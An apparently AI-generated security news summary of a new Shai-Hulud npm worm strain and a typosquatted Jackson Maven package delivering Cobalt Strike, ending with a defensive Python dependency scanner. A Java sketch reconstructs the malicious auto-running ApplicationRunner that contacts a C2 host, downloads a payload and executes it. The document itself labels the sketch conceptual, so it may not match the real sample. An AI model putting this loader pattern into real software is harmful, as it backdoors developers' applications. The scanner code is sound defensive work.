New Shai-Hulud Strain and Fake Jackson Package Target Developers
These articles are AI-generated summaries. Please check the original sources for full details.
Supply Chain Attacks Continue with Shai-Hulud and Jackson Variants
A new strain of the Shai-Hulud worm was detected on the npm registry on December 28, 2025, and a fake Jackson Maven package was found delivering Cobalt Strike beacons, demonstrating the persistent threat to open-source software dependencies. The npm package, “@vietmoney/react-big-calendar,” has been downloaded 698 times, indicating a potential for widespread compromise.
Why This Matters
Software supply chain attacks represent a critical vulnerability, as a single compromised dependency can impact countless downstream users. Typical development workflows implicitly trust package repositories, and attackers actively exploit that trust to inject malicious code. The potential scale of compromise is enormous: one successful attack can affect thousands of projects and organizations, resulting in significant financial and reputational damage.
Key Insights
- Shai-Hulud Initial Discovery: The original Shai-Hulud attack surfaced in September 2025, targeting API keys and cloud credentials.
- Package Typosquatting: Attackers leverage subtle differences in package names (e.g., org.fasterxml.jackson.core vs. com.fasterxml.jackson.core) to deceive developers.
- Cobalt Strike as Payload: The malicious Jackson package delivers Cobalt Strike, a legitimate penetration testing tool repurposed for malicious post-exploitation activities.
Working Example
// Example of how the malicious Jackson package operates within a Spring Boot application
// (Conceptual - based on the article's description)
// The malware's ApplicationRunner is invoked automatically after the application context loads.
// No explicit calls required.
public class ApplicationRunner implements org.springframework.boot.ApplicationRunner {
    @Override
    public void run(org.springframework.boot.ApplicationArguments args) throws java.lang.Exception {
        // Check for the presence of ".idea.pid" to avoid multiple instances
        java.io.File pidFile = new java.io.File(".idea.pid");
        if (pidFile.exists()) {
            System.out.println("Another instance running. Exiting.");
            return;
        }
        // Contact external server to fetch payload URL
        String serverAddress = "m.fasterxml[.]org:51211";
        // ... (code to establish connection and retrieve encrypted payload URL) ...
        // Download and execute payload based on OS
        String os = System.getProperty("os.name").toLowerCase();
        String payloadUrl = "..."; // Retrieved from server
        // ... (code to download payload) ...
        if (os.contains("win")) {
            // Execute svchosts.exe
            Runtime.getRuntime().exec("cmd /c start svchosts.exe");
        } else if (os.contains("mac")) {
            // Execute update
            Runtime.getRuntime().exec("./update");
        }
    }
}
Practical Applications
- GitHub: Organizations should enforce strict dependency review policies and utilize tools like Dependabot to identify and mitigate vulnerabilities in dependencies.
- Pitfall: Relying solely on automated dependency updates without manual review can inadvertently introduce malicious packages into a project.
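The dependency review the two points above call for can be partly automated. The following is an added example, not code from the article or from any project it names: it scans a constructed pom.xml and package-lock.json for the two indicators the article gives (the org.fasterxml.jackson.core group and the @vietmoney/react-big-calendar package) and also flags the generic typosquatting pattern behind them, a group ID that closely resembles a trusted one and a scoped npm package that shadows an unscoped one already in the tree. The sample manifests, the trusted-group allow-list and the 0.85 similarity threshold are assumptions made for the illustration.

```python
"""Scan Maven and npm manifests for known-bad and look-alike dependencies.

Added example. The known-bad coordinates are the ones named in the article;
the sample manifests, TRUSTED_MAVEN_GROUPS and the similarity threshold are
constructed assumptions for illustration.
"""
import difflib
import json
import xml.etree.ElementTree as ET

# Indicators quoted in the article.
KNOWN_BAD_MAVEN_GROUPS = {"org.fasterxml.jackson.core"}
KNOWN_BAD_NPM_PACKAGES = {"@vietmoney/react-big-calendar"}

# Assumption: group IDs this project is allowed to depend on (team-maintained).
TRUSTED_MAVEN_GROUPS = {"com.fasterxml.jackson.core", "org.springframework.boot"}

# Constructed pom.xml: the genuine Jackson group, the typosquat from the article,
# and a made-up misspelling ("jakson") to exercise the look-alike check.
SAMPLE_POM = """<project xmlns="http://maven.apache.org/POM/4.0.0">
  <dependencies>
    <dependency><groupId>com.fasterxml.jackson.core</groupId><artifactId>jackson-databind</artifactId></dependency>
    <dependency><groupId>org.fasterxml.jackson.core</groupId><artifactId>jackson-databind</artifactId></dependency>
    <dependency><groupId>com.fasterxml.jakson.core</groupId><artifactId>jackson-databind</artifactId></dependency>
    <dependency><groupId>org.springframework.boot</groupId><artifactId>spring-boot-starter</artifactId></dependency>
  </dependencies>
</project>"""

# Constructed package-lock.json (lockfileVersion 3 layout) with the npm package
# from the article plus a made-up scoped package shadowing an unscoped one.
SAMPLE_PACKAGE_LOCK = json.dumps({
    "name": "demo-app",
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "demo-app"},
        "node_modules/react-big-calendar": {"version": "1.8.2"},
        "node_modules/@vietmoney/react-big-calendar": {"version": "1.0.0"},
        "node_modules/lodash": {"version": "4.17.21"},
        "node_modules/@example-scope/lodash": {"version": "0.0.1"},
    },
})


def _local(tag):
    """Strip the XML namespace that real POM files declare on every element."""
    return tag.rsplit("}", 1)[-1]


def _child_text(elem, local_name):
    for child in elem:
        if _local(child.tag) == local_name and child.text:
            return child.text.strip()
    return ""


def maven_coordinates(pom_xml):
    """Return (groupId, artifactId) pairs for every <dependency> in a pom.xml string."""
    root = ET.fromstring(pom_xml)
    return [(_child_text(d, "groupId"), _child_text(d, "artifactId"))
            for d in root.iter() if _local(d.tag) == "dependency"]


def npm_package_names(lock_json):
    """Return package names from the 'packages' map of a v2/v3 package-lock.json."""
    lock = json.loads(lock_json)
    return [path.split("node_modules/")[-1]
            for path in lock.get("packages", {}) if path]


def lookalike(candidate, trusted, threshold=0.85):
    """Return the trusted name the candidate most resembles, if close but not identical."""
    best, best_ratio = None, 0.0
    for name in trusted:
        ratio = difflib.SequenceMatcher(None, candidate, name).ratio()
        if ratio > best_ratio:
            best, best_ratio = name, ratio
    if best is not None and best != candidate and best_ratio >= threshold:
        return best
    return None


def scan_pom(pom_xml):
    """Flag known-bad groups, then anything outside the allow-list (look-alikes first)."""
    findings = []
    for group, artifact in maven_coordinates(pom_xml):
        coord = f"{group}:{artifact}"
        if group in KNOWN_BAD_MAVEN_GROUPS:
            findings.append(("known-bad", coord))
        elif group not in TRUSTED_MAVEN_GROUPS:
            kind = "lookalike" if lookalike(group, TRUSTED_MAVEN_GROUPS) else "untrusted"
            findings.append((kind, coord))
    return findings


def scan_npm_lock(lock_json):
    """Flag known-bad packages and scoped packages that shadow an unscoped dependency."""
    names = npm_package_names(lock_json)
    unscoped = {n for n in names if not n.startswith("@")}
    findings = []
    for name in names:
        if name in KNOWN_BAD_NPM_PACKAGES:
            findings.append(("known-bad", name))
        elif name.startswith("@") and name.split("/", 1)[1] in unscoped:
            findings.append(("scoped-shadow", name))
    return findings


if __name__ == "__main__":
    for kind, coord in scan_pom(SAMPLE_POM) + scan_npm_lock(SAMPLE_PACKAGE_LOCK):
        print(f"{kind:14} {coord}")
```

The "scoped-shadow" and "lookalike" findings are review hints rather than verdicts: plenty of legitimate scoped packages share a name with an unscoped one, so the output is meant to gate a human review step in CI, which is exactly the manual check the pitfall above says automated updates should not skip.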